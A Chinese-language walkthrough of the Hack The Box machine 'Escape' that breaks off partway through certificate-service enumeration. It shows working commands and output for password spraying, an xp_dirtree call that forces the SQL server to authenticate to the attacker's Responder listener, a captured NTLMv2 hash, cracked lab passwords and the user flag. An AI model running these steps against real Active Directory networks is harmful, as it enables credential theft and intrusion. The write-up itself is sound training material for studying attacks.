Escape (htb)

0x00 总结

  1. smb 服务泄露的账密
  2. 强制认证攻击获取 shell
  3. 数据库日志信息分析拿到凭证横向移动
  4. 证书服务攻击提权

0x01 初步信息收集

1.1 端口扫描

nmap 进行端口扫描

┌──(kali㉿kali)-[~/htb/escape]
└─$ nmap -p- 10.129.12.4 --min-rate 1000 -oA nmapscan/protsacan                
Starting Nmap 7.95 ( https://nmap.org ) at 2026-07-05 03:24 EDT
Nmap scan report for 10.129.12.4
Host is up (0.13s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49710/tcp open  unknown
49713/tcp open  unknown
49729/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 130.13 seconds

1.2 查询域名

我会使用 ldapsearch

┌──(kali㉿kali)-[~/htb/escape]
└─$ ldapsearch -x -H ldap://10.129.12.4 -s base -b "" namingcontexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=sequel,DC=htb
namingcontexts: CN=Configuration,DC=sequel,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingcontexts: DC=DomainDnsZones,DC=sequel,DC=htb
namingcontexts: DC=ForestDnsZones,DC=sequel,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1  

1.3 smb共享枚举

smbclient 枚举共享

┌──(kali㉿kali)-[~/htb/escape]
└─$ smbclient -L //sequel.htb/ADMIN$ -N 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to sequel.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

查看每个贡献的目录

┌──(kali㉿kali)-[~/htb/escape]
└─$ smbclient  //sequel.htb/Public -N 
Try "help" to get a list of possible commands.
smb: \> get SQL Server Procedures.pdf 
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \SQL
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (82.0 KiloBytes/sec) (average 82.0 KiloBytes/sec)

发现一个pdf文件,下载下来
image.png
其中提到了数据库和一组凭据
PublicUser:GuestUserCantWrite1
我会用它尝试连接 mssql 数据库,毕竟先前在端口扫描中有出现

┌──(kali㉿kali)-[~/htb/escape]
└─$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.129.12.4
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>

我尝试在数据库中找一些敏感信息,但是一无所获
于是我想到做一个密码喷洒

┌──(kali㉿kali)-[~/htb/escape]
└─$ nxc smb 10.129.12.4   -u users_new.txt -p 'GuestUserCantWrite1'  --shares --continue-on-success
SMB         10.129.12.4     445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Administrator:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Guest:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\krbtgt:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [+] sequel.htb\Domain:GuestUserCantWrite1 (Guest)
SMB         10.129.12.4     445    DC               [+] sequel.htb\Protected:GuestUserCantWrite1 (Guest)
SMB         10.129.12.4     445    DC               [-] sequel.htb\DC$:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Tom.Henn:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Brandon.Brown:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Ryan.Cooper:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\sql_svc:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\James.Roberts:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Nicole.Thompson:GuestUserCantWrite1 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [+] sequel.htb\SQLServer2005SQLBrowserUser$DC:GuestUserCantWrite1 (Guest)

成功拿到了三组凭据

Domain:GuestUserCantWrite1
Protected:GuestUserCantWrite1
SQLServer2005SQLBrowserUser$DC:GuestUserCantWrite1

但是他们都无法登入
于是我尝试对 mssql 的强制认证攻击

1.4 强制认证攻击

先监听,我用到 responder

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0   
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.27]
    Responder IPv6             [fe80::2e83:fc3b:8f24:da30]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-X2CRHC4GQAF]
    Responder Domain Name      [DIWZ.LOCAL]
    Responder DCE-RPC Port     [49247]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder

[+] Listening for events...

然后在 mssql的窗口中,访问 kalismb 共享

EXEC master.dbo.xp_dirtree '\\10.10.16.27\share';

发现捕获成功

[SMB] NTLMv2-SSP Client   : 10.129.12.4
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:5b79b066e78bae19:FBD0E75C863C5F280A6725D3A677646F:010100000000000000D9EBD75E0CDD01408590BF29FBC0DA00000000020008004400490057005A0001001E00570049004E002D005800320043005200480043003400470051004100460004003400570049004E002D00580032004300520048004300340047005100410046002E004400490057005A002E004C004F00430041004C00030014004400490057005A002E004C004F00430041004C00050014004400490057005A002E004C004F00430041004C000700080000D9EBD75E0CDD010600040002000000080030003000000000000000000000000030000015043D88FCC6B77FD05786BBC4487F90F630351987D95BB0E2A3DAE7737DA86C0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320037000000000000000000

hash 存入文件,用 hashcat 模式 5600 来破解
拿到 sql_svc的凭证 sql_svc:REGGIE1234ronnie
依旧先做一个密码喷洒,没有发现别的有效用户

1.5 获取 shell

这个服务账户一个能够登入了

┌──(kali㉿kali)-[~/htb/escape]
└─$ evil-winrm -i sequel.htb -u sql_svc -p REGGIE1234ronnie  
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> 

但是没能找到 flag

0x02 内网域信息收集

2.1 bloodhound 分析

bloodhound 收集信息

┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c ALL -d sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie' -dc dc.sequel.htb -ns 10.129.12.4 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.sequel.htb
INFO: Testing resolved hostname connectivity dead:beef::9020:f3b7:ca10:7f39
INFO: Trying LDAP connection to dead:beef::9020:f3b7:ca10:7f39
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sequel.htb
INFO: Testing resolved hostname connectivity dead:beef::9020:f3b7:ca10:7f39
INFO: Trying LDAP connection to dead:beef::9020:f3b7:ca10:7f39
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sequel.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20260705093018_bloodhound.zip

启动 neo4j导入信息

┌──(kali㉿kali)-[~]
└─$ sudo neo4j restart     
[sudo] password for kali: 
Neo4j is not running.
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:13015). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~]
└─$ bloodhound-legacy

稍微分析了一下,没太多有用的内容

2.2 机器信息枚举

在根目录下有 sqlserver 目录 因为先前的 pdf 文件,所以我对他很感兴趣

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows


*Evil-WinRM* PS C:\> cd sqlserver
*Evil-WinRM* PS C:\sqlserver> dir


    Directory: C:\sqlserver


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK


*Evil-WinRM* PS C:\sqlserver\logs> download ERRORLOG.BAK
Info: Downloading C:\sqlserver\logs\ERRORLOG.BAK to ERRORLOG.BAK
Info: Download successful!
*Evil-WinRM* PS C:\sqlserver\logs> 

发现了 .bak 文件还有 .exe 文件 我们先看 .bak 文件

┌──(kali㉿kali)-[~/htb/escape]
└─$ cat ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server      UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server      (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server      All rights reserved.
2022-11-18 13:43:05.97 Server      Server process ID is 3788.
2022-11-18 13:43:05.97 Server      System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server      Authentication mode is MIXED.
2022-11-18 13:43:05.97 Server      Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'.
2022-11-18 13:43:05.97 Server      The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      Registry startup parameters:
         -d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf
         -e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG
         -l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf
2022-11-18 13:43:05.97 Server      Command Line Startup Parameters:
         -s "SQLMOCK"
         -m "SqlSetup"
         -Q
         -q "SQL_Latin1_General_CP1_CI_AS"
         -T 4022
         -T 4010
         -T 3659
         -T 3610
         -T 8015
2022-11-18 13:43:05.97 Server      SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      SQL Server is starting at normal priority base (=7). This is an informational message only. No user action is required.
2022-11-18 13:43:05.97 Server      Detected 2046 MB of RAM. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      Using conventional memory in the memory manager.
2022-11-18 13:43:05.97 Server      Page exclusion bitmap is enabled.
2022-11-18 13:43:05.98 Server      Buffer Pool: Allocating 262144 bytes for 166158 hashPages.
2022-11-18 13:43:06.01 Server      Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033)
2022-11-18 13:43:06.04 Server      Buffer pool extension is already disabled. No action is necessary.
2022-11-18 13:43:06.06 Server      Perfmon counters for resource governor pools and groups failed to initialize and are disabled.
2022-11-18 13:43:06.07 Server      Query Store settings initialized with enabled = 1,
2022-11-18 13:43:06.07 Server      This instance of SQL Server last reported using a process ID of 5116 at 11/18/2022 1:43:04 PM (local) 11/18/2022 9:43:04 PM (UTC). This is an informational message only; no user action is required.
2022-11-18 13:43:06.07 Server      Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required.
2022-11-18 13:43:06.07 Server      Using dynamic lock allocation.  Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node.  This is an informational message only.  No user action is required.
2022-11-18 13:43:06.08 Server      In-Memory OLTP initialized on lowend machine.
2022-11-18 13:43:06.08 Server      The maximum number of dedicated administrator connections for this instance is '1'
2022-11-18 13:43:06.09 Server      [INFO] Created Extended Events session 'hkenginexesession'
2022-11-18 13:43:06.09 Server      Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required.
2022-11-18 13:43:06.10 Server      CLR version v4.0.30319 loaded.
2022-11-18 13:43:06.10 Server      Total Log Writer threads: 1. This is an informational message; no user action is required.
2022-11-18 13:43:06.13 Server      Database Mirroring Transport is disabled in the endpoint configuration.
2022-11-18 13:43:06.13 Server      clflushopt is selected for pmem flush operation.
2022-11-18 13:43:06.14 Server      Software Usage Metrics is disabled.
2022-11-18 13:43:06.14 spid9s      Warning ******************
2022-11-18 13:43:06.36 spid9s      SQL Server started in single-user mode. This an informational message only. No user action is required.
2022-11-18 13:43:06.36 Server      Common language runtime (CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.
2022-11-18 13:43:06.37 spid9s      Starting up database 'master'.
2022-11-18 13:43:06.38 spid9s      The tail of the log for database master is being rewritten to match the new sector size of 4096 bytes.  2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written.
2022-11-18 13:43:06.39 spid9s      Converting database 'master' from version 897 to the current version 904.
2022-11-18 13:43:06.39 spid9s      Database 'master' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.40 spid9s      Database 'master' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.52 spid9s      Database 'master' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.52 spid9s      Database 'master' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:06.72 spid9s      SQL Server Audit is starting the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.72 spid9s      SQL Server Audit has started the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.74 spid9s      SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s      Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s     Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s      Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s     Password policy update was successful.                                           
2022-11-18 13:43:06.76 spid14s     The resource database build version is 15.00.2000. This is an informational message only. No user action is required.
2022-11-18 13:43:06.78 spid9s      The tail of the log for database msdb is being rewritten to match the new sector size of 4096 bytes.  3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written.
2022-11-18 13:43:06.78 spid9s      Converting database 'msdb' from version 897 to the current version 904.
2022-11-18 13:43:06.78 spid9s      Database 'msdb' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.79 spid14s     Starting up database 'model'.
2022-11-18 13:43:06.79 spid9s      Database 'msdb' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.80 spid14s     The tail of the log for database model is being rewritten to match the new sector size of 4096 bytes.  512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written.
2022-11-18 13:43:06.80 spid9s      Database 'msdb' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.81 spid14s     Converting database 'model' from version 897 to the current version 904.
2022-11-18 13:43:06.81 spid14s     Database 'model' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.81 spid9s      Database 'msdb' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.81 spid14s     Database 'model' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.81 spid9s      Database 'msdb' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.82 spid14s     Database 'model' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.88 spid18s     A self-generated certificate was successfully loaded for encryption.
2022-11-18 13:43:06.88 spid18s     Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ].
2022-11-18 13:43:06.88 spid18s     Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required.
2022-11-18 13:43:06.88 spid18s     SQL Server is now ready for client connections. This is an informational message; no user action is required.
2022-11-18 13:43:06.88 Server      SQL Server is attempting to register a Service Principal Name (SPN) for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required.
2022-11-18 13:43:06.88 spid14s     Database 'model' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.89 Server      The SQL Server Network Interface library could not register the Service Principal Name (SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if
 the SPN has not been manually registered.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.00 spid14s     Clearing tempdb database.
2022-11-18 13:43:07.06 spid14s     Starting up database 'tempdb'.
2022-11-18 13:43:07.17 spid9s      Database 'msdb' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:07.17 spid9s      Database 'msdb' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.29 spid9s      Recovery is complete. This is an informational message only. No user action is required.
2022-11-18 13:43:07.30 spid51      Changed database context to 'master'.                                            
2022-11-18 13:43:07.30 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.33 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.                                            
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.                                            
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.                                            
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.                                            
2022-11-18 13:43:08.24 spid51      Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s      SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s      .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s      SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.

打开后是大量的日志信息,但是有两条值得我们关注

Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided.
Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided.

这里提到了 Ryan.Cooper 用户 还有 NuclearMosquito3用户,但是我们先前的目录列表里没有这个用户,所以有没有可能是这个用户在登入时,参数错位导致密码被当成用户计入到日志内呢,我们进行一下密码喷洒

┌──(kali㉿kali)-[~/htb/escape]
└─$ nxc smb 10.129.12.4 -u users_new.txt -p 'NuclearMosquito3' --continue-on-success
SMB         10.129.12.4     445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Administrator:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Guest:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\krbtgt:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [+] sequel.htb\Domain:NuclearMosquito3 (Guest)
SMB         10.129.12.4     445    DC               [+] sequel.htb\Protected:NuclearMosquito3 (Guest)
SMB         10.129.12.4     445    DC               [-] sequel.htb\DC$:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Tom.Henn:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Brandon.Brown:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 
SMB         10.129.12.4     445    DC               [-] sequel.htb\sql_svc:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\James.Roberts:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [-] sequel.htb\Nicole.Thompson:NuclearMosquito3 STATUS_LOGON_FAILURE 
SMB         10.129.12.4     445    DC               [+] sequel.htb\SQLServer2005SQLBrowserUser$DC:NuclearMosquito3 (Guest)

于是获得新凭证 Ryan.Cooper:NuclearMosquito3

2.3 获取 user flag

Ryan.Cooper:NuclearMosquito3 凭证登入,成功在 desktop 文件夹下找到 flag

*Evil-WinRM* PS C:\Users\Ryan.Cooper> type desktop/user.txt
a607c6e3f225bb8cfae3cfdeaae6f1aa

0x03 证书服务提权

3.1 检查域内是否有 CA

certuil

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> certutil -dump | findstr "Config"
  Config:                       "dc.sequel.htb\sequel-DC-CA"

发现有 CA
certipy-ad 进行检查
找寻可利用的模板

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]  
└─$ certipy-ad find -u Ryan.Cooper@sequel.htb -p 'NuclearMosquito3' -vulnerable -dc-ip 10.129.12.4       
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities                               
[*] Found 1 certificate authority                                
[*] Found 12 enabled certificate templates                            
[*] Finding issuance policies   
[*] Found 15 issuance policies                                    
[*] Found 0 OIDs linked to templates                              
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP            
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'    
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'   
[!] Error checking web enrollment: timed out                      
[!] Use -debug to print a stacktrace                                  
[!] Error checking web enrollment: timed out                      
[!] Use -debug to print a stacktrace                             
[*] Saving text output to '20260706011908_Certipy.txt'                
[*] Wrote text output to '20260706011908_Certipy.txt'            
[*] Saving JSON output to '20260706011908_Certipy.json'
[*] Wrote JSON output to '20260706011908_Certipy.json

查看结果

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]
└─$ cat 20260706011908_Certipy.txt                                                                 
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
